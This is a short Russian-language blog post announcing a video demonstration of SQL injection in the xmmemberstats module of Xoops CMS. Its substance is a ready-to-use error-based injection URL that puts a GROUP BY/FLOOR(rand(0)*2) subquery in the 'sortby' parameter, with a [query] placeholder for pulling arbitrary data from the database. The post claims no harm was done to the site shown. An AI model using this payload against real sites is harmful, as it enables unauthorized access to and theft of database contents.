[Видео] xoops sql-inj

Небольшой видео-материал, который показывает sql-injection в Xoops CMS. Показанному в видео сайту не был нанесен никакой вред.
Видео

http://[host]/modules/xmmemberstats/INDEX.php?letter=&sortby=uname+OR+(SELECT+COUNT(*)+FROM+(SELECT+1+UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+concat(([query]),FLOOR(rand(0)*2)))

, , ,

Оставить комментарий

Top ↑ | Main page | Back